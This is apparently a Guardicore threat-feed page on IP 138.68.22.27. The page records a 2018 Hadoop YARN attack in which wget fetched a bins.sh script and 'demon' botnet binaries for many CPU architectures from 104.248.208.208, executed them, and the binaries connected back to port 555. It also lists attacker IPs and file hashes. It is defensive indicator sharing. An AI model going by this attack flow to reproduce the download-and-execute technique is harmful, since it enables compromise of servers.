IP Address: 138.68.22.27Previously Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
138.68.22.27​
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Scanner

Services Targeted

HadoopYARN

Tags

HTTP HadoopYARN Malicious File IDS - Web Application Attack Outgoing Connection Download and Allow Execution Download and Execute Download File Inbound HTTP Request

Associated Attack Servers

aruba.it

52.168.150.12 194.182.73.177 80.211.50.132 40.76.38.75 104.248.208.208 52.166.121.133 13.92.131.99 13.82.50.132 52.233.143.163 40.71.182.235 52.166.206.33 52.233.179.93 13.81.2.109 40.114.243.66 13.92.99.153 52.174.179.113 40.114.13.12 137.135.92.186 52.166.59.19 52.166.63.111

Basic Information

IP Address

138.68.22.27

Domain

-

ISP

Digital Ocean

Country

United States

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2018-09-30

Last seen in Guardicore Centra

2018-10-08

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

Process /usr/bin/wget generated outgoing network traffic to: 104.248.208.208:80 17 times

Outgoing Connection

The file /tmp/bins.sh was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/demon.arm4tl was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.arm4tl was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.arm5 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.arm5 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.arm6 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.arm6 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

IDS detected Web Application Attack : 401TRG Generic Webshell Request - POST with wget in body

IDS - Web Application Attack

The file /tmp/demon.i486 was downloaded and executed 5 times

Download and Execute

Process /tmp/demon.i486 generated outgoing network traffic to: 104.248.208.208:555

Outgoing Connection

The file /tmp/demon.i686 was downloaded and executed 3 times

Download and Execute

Process /tmp/demon.i686 generated outgoing network traffic to: 104.248.208.208:555

Outgoing Connection

The file /tmp/demon.m68k was downloaded and executed 2 times

Download and Execute

The file /tmp/demon.mips was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.mips was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.mips64 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.mips64 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.mpsl was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.mpsl was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.ppc was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.ppc was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.sparc was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.sparc was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.x86 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.x86 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.i586 was downloaded and executed 2 times

Download and Execute

The file /tmp/demon.sh4 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.sh4 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.arm7 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.arm7 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

Connection was closed due to user inactivity

/tmp/demon.m68k was identified as malicious by YARA according to rules: Maldoc Somerules, Suspicious Strings and 000 Common Rules

Malicious File

/tmp/demon.i486 was identified as malicious by YARA according to rules: Maldoc Somerules, Suspicious Strings and 000 Common Rules

Malicious File

/tmp/demon.i586 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

/tmp/demon.i686 was identified as malicious by YARA according to rules: Maldoc Somerules, Suspicious Strings and 000 Common Rules

Malicious File

Associated Files

/tmp/yeet

SHA256: bed8aab405b6f59ec88224899a2e511a1915d77f8b0d22fb2f44b514d5dadb6d

82750 bytes

/tmp/yeetw

SHA256: 1d73f98a382494b064f49de9f3e0b2564c25a88c0d9855130335eca4e2f097d8

72363 bytes

/tmp/dank.x86

SHA256: b2d27ed238b84e93899772a918fee7bd713d4438d8a0e4bd70b051f21f1f1e35

83042 bytes

/tmp/bins.sh

SHA256: 19b0f111be1bf6d503a78ef65b4316d69265a860dca71da24e2c0f5bbaaba7ef

2388 bytes

/tmp/demon.arm4tl

SHA256: 977cbc0a793e8790d8fd9ad0e761fccbd777a5dd39929d250934fdbc2db24f17

107395 bytes

/tmp/demon.arm5

SHA256: 1a24763a5c6d8aa6f5e751ccdf6e76e4eea3a8bb9d9bf9e56b586646a9b67154

148135 bytes

/tmp/demon.arm6

SHA256: edeac50d5f6860f82b712358b1d5004eb30667d913ecea16e1bc6b181164aa6c

148107 bytes

/tmp/demon.i686

SHA256: 31e316eef160604214e4b8f2483462eee3feabe9e4d3434b149f0be09e6043dd

83814 bytes

/tmp/demon.m68k

SHA256: a24b4bba2943902c03e78284b719801c78499f13507787c6d1c06a2b51469532

87078 bytes

/tmp/demon.mips

SHA256: 1d43360d602c33e3775f19cb9d7fe89f4240927e4e52677a066b7dd165ae87c7

107896 bytes

/tmp/demon.sparc

SHA256: bec5c139b94595ba015ab73294f1d221035e24523606ce1bf655a91de9e7c685

101166 bytes

/tmp/demon.mips64

SHA256: 289bddd97576cd0f151d394caefdaf2ec6ed341c146b9a17b63ab25aa7a98959

135241 bytes

/tmp/demon.mpsl

SHA256: 26eeea9bf0e58184e29e3d03342781a78151b1a7ffbd3dc7e28ac5a54fa3b4f1

189759 bytes

/tmp/demon.x86

SHA256: 3fee836d1dad66aa33742d4d880972bc694e6a6b9aec922fb5c76fe6f73be358

118964 bytes

/tmp/demon.i586

SHA256: 445da506e50db30090c1700f3a2cb9c9e5961733317996908eabf17cb3811b6c

99090 bytes

/tmp/demon.i486

SHA256: 2a036cfafc1afbe450c77a6cfa93d2e548a53846ec2e5316747763b6a8034721

83766 bytes

/tmp/demon.sh4

SHA256: 0fe9b4c062b91e25d27ad515db5ec68cf339fb0723fbda7cac13565eacff1e33

94018 bytes

/tmp/demon.arm7

SHA256: 42f11f6eaf764cc962ac2476f4dcb25549985ea03f67b1e90dd966d22f567568

148107 bytes

/tmp/demon.ppc

SHA256: 43c70e179ee8b1f2e38c48d992ebebe43d2befe38d088062167a6e90f4df8915

135241 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 138.68.22.27​Previously Malicious